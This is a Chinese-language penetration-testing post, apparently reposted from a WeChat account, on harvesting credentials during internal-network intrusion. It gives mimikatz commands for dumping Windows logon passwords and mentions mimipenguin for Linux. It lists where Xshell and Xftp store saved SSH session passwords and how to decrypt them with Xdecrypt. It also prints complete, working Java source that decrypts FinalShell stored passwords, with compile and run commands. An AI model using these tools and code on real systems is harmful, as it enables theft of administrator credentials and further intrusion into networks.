本文转自微信公众号
本篇文章围绕密码讲解:
一、密码抓取神器mimikatz(功能很强大自行github看介绍)
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单。github地址:https://github.com/gentilkiwi/mimikatz/
读windows密码
privilege::debug //提升权限sekurlsa::logonpasswords //抓取密码
读取明文密码只能在Windows2008操作系统之前。之后需要解密哈希
获取linux密码
mimipenguin是一款Linux下的密码抓取神器,其实就是mimikatz的Linux平台仿造版本。
github地址:https://github.com/huntergregal/mimipenguin
条件:root权限
以下环境测试通过:
Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)(阿里测试失败)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)(阿里测试失败)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions)
openssh-server 1:7.3p1-1 (Active SSH connections sudo usage)
二、Xshell&Finalshell密码破解
用途:
内网渗透中会遇到一些管理员主机上存在xshell、finalshell等ssh管理工具,这里主要讲解如何抓取已经保存主机的明文密码。
**Xshell&Xftp **
xshell和xftp常用保存密码存储的路径
C:\Users\用户名\Documents\Application Data\NetSarang\(xshell 或 xftp)\Sessions C:\Users\用户名\Documents\NetSarang Computer\6\( xshell 或 xftp )\Sessions\xshell安装路径\(xshell 或 xftp)\Sessions
xsh文件就是xshell连接服务器配置文件,解密文件需要获取当前用户名和SID
解密工具讲解:Xdecrypt
工具地址: https://github.com/dzxs/Xdecrypt
官方指导用法:
usage: Xdecrypt.py [-h] [-s SID] [-p PASSWORD]
xsh, xfp password decrypt
optional arguments:
-h, --help show this help message and exit
-s SID, --sid SID `username`+`sid`, user `whoami /user` in command.-p PASSWORD, --password PASSWORD
the password in sessions or path of sessions
本人使用方法:
python3 Xdecrypt.py -p "C:\Users\用户名\Documents\NetSarang Computer\6\Xshell\Sessions"
三、finalshell密码解密
finalshell的配置文件存放在finalshell的安装路径下的conn文件
finalshell安装路径\conn\xxx.json
打开json文件ctrl+F 搜索 password
大佬写的解密脚本地址:https://www.secquan.org/Tools/1071223
java脚本:
import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.IOException; import java.math.BigInteger; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.security.SecureRandom; import java.util.Base64; import java.util.Random; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.DESKeySpec; public class FinalShellDecodePass { public static void main(String[] args)throws Exception { System.out.println(decodePass(args[0])); } public static byte[] desDecode(byte[] data, byte[] head) throws Exception { SecureRandom sr = new SecureRandom(); DESKeySpec dks = new DESKeySpec(head); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES"); SecretKey securekey = keyFactory.generateSecret(dks); Cipher cipher = Cipher.getInstance("DES"); cipher.init(2, securekey, sr); return cipher.doFinal(data); } public static String decodePass(String data) throws Exception { if (data == null) { return null; } else { String rs = ""; byte[] buf = Base64.getDecoder().decode(data); byte[] head = new byte[8]; System.arraycopy(buf, 0, head, 0, head.length); byte[] d = new byte[buf.length - head.length]; System.arraycopy(buf, head.length, d, 0, d.length); byte[] bt = desDecode(d, ranDomKey(head)); rs = new String(bt); return rs; } } static byte[] ranDomKey(byte[] head) { long ks = 3680984568597093857L / (long)(new Random((long)head[5])).nextInt(127); Random random = new Random(ks); int t = head[0]; for(int i = 0; i < t; ++i) { random.nextLong(); } long n = random.nextLong(); Random r2 = new Random(n); long[] ld = new long[]{(long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]}; ByteArrayOutputStream bos = new ByteArrayOutputStream(); DataOutputStream dos = new DataOutputStream(bos); long[] var15 = ld; int var14 = ld.length; for(int var13 = 0; var13 < var14; ++var13) { long l = var15[var13]; try { dos.writeLong(l); } catch (IOException var18) { var18.printStackTrace(); } } try { dos.close(); } catch (IOException var17) { var17.printStackTrace(); } byte[] keyData = bos.toByteArray(); keyData = md5(keyData); return keyData; } public static byte[] md5(byte[] data) { String ret = null; byte[] res=null; try { MessageDigest m; m = MessageDigest.getInstance("MD5"); m.update(data, 0, data.length); res=m.digest(); ret = new BigInteger(1, res).toString(16); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); } return res; } }
复制出来,保存为:FinalShellDecodePass.java格式
使用命令行进行编译:
javac FinalShellDecodePass.java
会生成FinalShellDecodePass.class文件。
FinalShellDecodePass.class用来解密被加密的密码!!!!
使用方法:java FinalShellDecodePass 密文
解密:
java FinalShellDecodePass G0BqHChBZXFDrX17ItJZ5g==